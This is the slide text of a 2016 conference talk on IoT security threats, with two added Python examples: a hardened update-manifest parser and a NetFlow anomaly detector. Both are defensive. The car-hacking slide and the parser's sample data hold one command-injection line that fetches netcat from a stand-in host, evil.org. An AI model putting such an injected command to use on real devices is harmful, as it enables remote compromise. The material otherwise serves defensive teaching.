The Internet of Threats: Billions of Ways the IoT Poses an InfoSec Challenge
Chris Poulin
CyberCrime 2016 Symposium: Cyber Convergence
IoT Researcher, Futurist
Maker
Breaker
Threat intel
Data geek
Provocateur
TV & movies
The easiest way to hack an Airbus A319
Some questions to establish context
What is your role with respect to the IoT?
• Personal consumer of the IoT
• Enterprise manager of IT systems
• A maker of IoT devices
What is your biggest concern with the IoT?
• Safety (e.g., HVAC systems gone wild)
• Data privacy
• Infrastructure security (e.g., IT commingling with IoT)
• New enterprise attack vectors (e.g., end users with wearables)
Smart Home Device Examples: Home Security
Security control and alarm panels
Smart door locks
Smart garage doors
Motion detectors
Window and door contacts
Security cameras
Smart doorbells
Smart Fridge
Smart Lighting
Smart Dishwasher
Smart Oven
Smart Television
Smart Utensils
Smart Wine
Smart Faucet
Smart Home Device Examples: Appliances, Lighting, Entertainment
Appliances
• Refrigerators and cooktops
• Beds
• Autonomous vacuums
Lighting
• Light bulbs (plain white and color changing)
• Pathway lighting
• Indoor and outdoor
Entertainment
• Smart televisions and DVRs
• Audio systems
Smart Home Device Examples: Environment & Safety
Smart thermostats
Smoke / CO detectors
Smart blinds
Water leak detectors
Smart air conditioners
Baby monitors
Smart homes are vulnerable
Your WiFi password is “fluffy123”
“Buy V!gar4”
Why does home automation matter to enterprise IT security?
Mirai malware infected devices
• Krebs: 620-650 Gbps
• OVH: ~1 Tbps
• Dyn: Amazon, PayPal, Box, Slack, Twitter, GitHub, Netflix, Airbnb, Pinterest, Quora, Spotify, Yelp, Second Life, WWE Network (services affected by the outage)
Smart Elevators
Smart Lighting
Smart Doors
Concrete Monitors
IIoT Device Examples: Building Automation
Electric & water
HVAC
Security systems
Lighting
Elevators and escalators
Polarized windows
Earthquake absorbers
Concrete mixing & curing
And they will be connected to your IT networks
IT Network BAS Network
Connected Cars
Connected Infrastructure
IIoT Device Examples: Smart Cities & Municipalities
Utilities
Lighting
Traffic flow
Trash
Air quality
Violence detection
Connected vehicle threat surface
Engine Control Unit
Transmission Control Unit
Airbag Control Unit
Anti-lock Braking System
Tire Pressure Monitor
Vehicle to Vehicle / Vehicle to Infrastructure Communications
Instrument Cluster / Telematics
Keyless Entry / Anti-theft
OBD-II
Car Multimedia
Dynamic Stability Control
DSRC RF RF channel
Bluetooth, WiFi, media players
OnStar, Uconnect, etc.
Direct connection RF channel
IVIs are messy
Linux / Tizen / QNX
Audio module (open source?)
Video module (open source?)
Apple CarPlay module
Google Android module
Microsoft Sync module
GPS module
Telematics
Voice module (open source?)
Update feature
WiFi module
…so let’s break one
Port 6667/TCP
V850
SPI
CAN bus
updates.txt: somepkg '; wget http://evil.org/nc; nc …
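Added example (not code from the talk or from any vendor): a hardened reader for an updates.txt-style manifest, showing the input check that rejects an entry like the injected one above and the argv-based install call that never hands the name to a shell. The package-name rule and the /usr/bin/ivi-install path are assumptions.

```python
import re
import subprocess

# Assumed package-name rule: letters, digits, dot, underscore, plus, dash only,
# so nothing a shell, a path or a URL could interpret survives validation.
PKG_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._+-]{0,63}$")
INSTALLER = "/usr/bin/ivi-install"   # hypothetical installer binary


def parse_update_manifest(text):
    """Split a manifest into accepted package names and rejected raw lines."""
    accepted, rejected = [], []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue                       # blank line or comment
        if PKG_NAME.fullmatch(line):
            accepted.append(line)
        else:
            rejected.append(raw)           # log it; never execute any part of it
    return accepted, rejected


def install_argv(pkg):
    """Build an argv list; the name is a single argument, not part of a shell string."""
    if not PKG_NAME.fullmatch(pkg):
        raise ValueError(f"refusing unsafe package name: {pkg!r}")
    return [INSTALLER, "--", pkg]


def apply_manifest(text, run=subprocess.run):
    """Install every accepted entry with shell=False; return the argv lists used."""
    accepted, rejected = parse_update_manifest(text)
    for bad in rejected:
        print(f"REJECTED manifest entry: {bad!r}")
    ran = []
    for pkg in accepted:
        argv = install_argv(pkg)
        run(argv, shell=False, check=False)   # no shell, so ';' and quotes are inert
        ran.append(argv)
    return ran


# Constructed sample manifest: one legitimate entry and one injection attempt
# modelled on the updates.txt line shown in the talk.
SAMPLE_MANIFEST = """# updates.txt
mediaplayer-2.1
somepkg '; wget http://evil.org/nc; nc ...
"""

if __name__ == "__main__":
    # A fake runner is used here so the demo does not need the installer to exist.
    print(apply_manifest(SAMPLE_MANIFEST, run=lambda argv, **kw: print("would run", argv)))
```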
Number of latent vulnerabilities in a modern luxury vehicle
Using the Linux kernel as a comparative model (as of 10 Oct 2016)
15M lines of code in Linux Kernel
1,507 reported vulnerabilities
1 vulnerability in every 9,954 lines of code
Source: http://www.cvedetails.com/vulnerability-list/vendor_id-33/product_id-47/Linux-Linux-Kernel.html
~10,000 latent vulnerabilities
The perfect storm of resources & tools
eBay, SparkFun, etc.
http://www.ioactive.com/pdfs/IOActive_Adventures_in_Automotive_Networks_and_Control_Units.pdf
http://illmatics.com/car_hacking_poories.pdf
http://marco.guardigli.it/2010/10/hacking-your-car.html
http://opengarages.org/handbook/
Build your own vehicle hacking lab & test cart
Protocol decodes available
IIoT Device Examples: Heavy Industries
Manufacturing:
• Pumps
• Conveyors
• Robots
Energy & Utilities:
• Smart meters
• Transformers
• Pumps
• Dam gates
Industrial IoT incidents
German steel mill
Stuxnet
Agricultural vulnerabilities
Planters: seed depth
Sprayers: dosage manipulation
Silos: manipulate environment
Livestock: feeding, drug, and environmental systems manipulation
Milk: manipulate pasteurization and pH balance systems
Hydroponics: manipulate environment
Irrigation: manipulate control and data
Seeds: manipulate environment
Slaughter: remote control—effect? Who knows…
Processing: manipulate waste system (reverse?)
IIoT Device Examples: Consumer Services
Healthcare
• X-ray machines
• Chemistry analyzers
• Pacemakers, insulin pumps
Retail
• Inventory tracking
• Stocking & picking
• Shipping
Healthcare: hacking a telesurgery unit
Wearable device examples
Apple Watch
Android Wear
Google Glass
Fitness Trackers
Pacemakers
Insulin pumps
Subcutaneous vitals monitor
Wearables security
Fitbit Bluetooth
Sync to PC
Malware: PC pwned!
Be Winston Wolfe. Solve problems.
“You’ve got a corpse in the car, minus a head. Take me to it.”
The layers of the IoT
Traditional IT Services & Security
IoT defense for IT security professionals (1 of 4)
1. Conduct an asset inventory
• Focus on critical assets and sensitive data
• NetFlow to passively identify assets
• VA scans to actively identify assets and add context
• RF scanning
• GQRX
• Scripting skillz
IoT defense for IT security professionals (2 of 4)
2. Segment systems based on risk
• Enclave firewalls
• Software defined networks
3. Monitor & defend IoT devices on the network
• IDS / IPS
• NetFlow—look for anomalies
• Map relationships of wearables to mobile to users
IoT defense for IT security professionals (3 of 4)
4. Protect IT endpoints
• Endpoint protection software
• VA scanning / patching
• Phishing exercises
5. Collect logs and events from IoT devices
• Log management / SIEM
IoT defense for IT security professionals (4 of 4)
6. Update security policies to include IoT devices
7. Familiarize yourself with non-IT connected devices
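Added example (not the talk's own code) for steps 1 and 3 above: a passive NetFlow-style asset inventory plus a baseline-versus-window comparison that flags assets never seen before, new external peers, and scanning or DDoS-style fan-out. The 10.20.0.0/16 range, the fan-out threshold and all flow records are constructed for the example.

```python
from collections import defaultdict
from ipaddress import ip_address, ip_network

INTERNAL = ip_network("10.20.0.0/16")   # assumed internal range for this example
FANOUT_THRESHOLD = 8                    # distinct destinations per window before flagging


def parse_flows(text):
    """Parse constructed 'src,dst,dport,proto' lines into (src, dst, port, proto) tuples."""
    rows = [ln.split(",") for ln in text.strip().splitlines() if ln.strip()]
    return [(s, d, int(p), pr) for s, d, p, pr in rows]


def inventory(flows):
    """Passive asset inventory: each internal source and the services it talks to."""
    assets = defaultdict(set)
    for src, dst, dport, proto in flows:
        if ip_address(src) in INTERNAL:
            assets[src].add((dst, dport, proto))
    return assets


def anomalies(baseline, window):
    """Report assets in the new window that deviate from the learned baseline."""
    known, current, findings = inventory(baseline), inventory(window), defaultdict(list)
    for asset, peers in current.items():
        if asset not in known:
            findings[asset].append("new asset: never seen in baseline")
            continue
        for dst, port, proto in sorted(peers - known[asset]):
            if ip_address(dst) not in INTERNAL:      # new external service contacted
                findings[asset].append(f"new external peer {dst}:{port}/{proto}")
        dests = {dst for dst, _, _ in peers}
        if len(dests) >= FANOUT_THRESHOLD:           # scanning / DDoS-style fan-out
            findings[asset].append(f"fan-out to {len(dests)} destinations")
    return dict(findings)


# Constructed flow records (not real captures). 10.20.0.77 is an IoT device that,
# in the new window, contacts an IRC port and sprays HTTP at many outside hosts.
BASELINE = parse_flows("""
10.20.0.5,10.20.0.1,53,udp
10.20.0.5,203.0.113.10,443,tcp
10.20.0.77,10.20.0.1,53,udp
10.20.0.77,203.0.113.44,443,tcp
""")
WINDOW = parse_flows("""
10.20.0.5,203.0.113.10,443,tcp
10.20.0.77,198.51.100.7,6667,tcp
10.20.0.90,10.20.0.1,53,udp
""" + "\n".join(f"10.20.0.77,198.51.100.{i},80,tcp" for i in range(10, 20)))
```

Running `anomalies(BASELINE, WINDOW)` reports 10.20.0.90 as a new asset and 10.20.0.77 for eleven new external peers and fan-out; the same baseline compared with itself reports nothing.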
Resources for makers
https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project
http://builditsecure.ly/
https://www.iamthecavalry.org/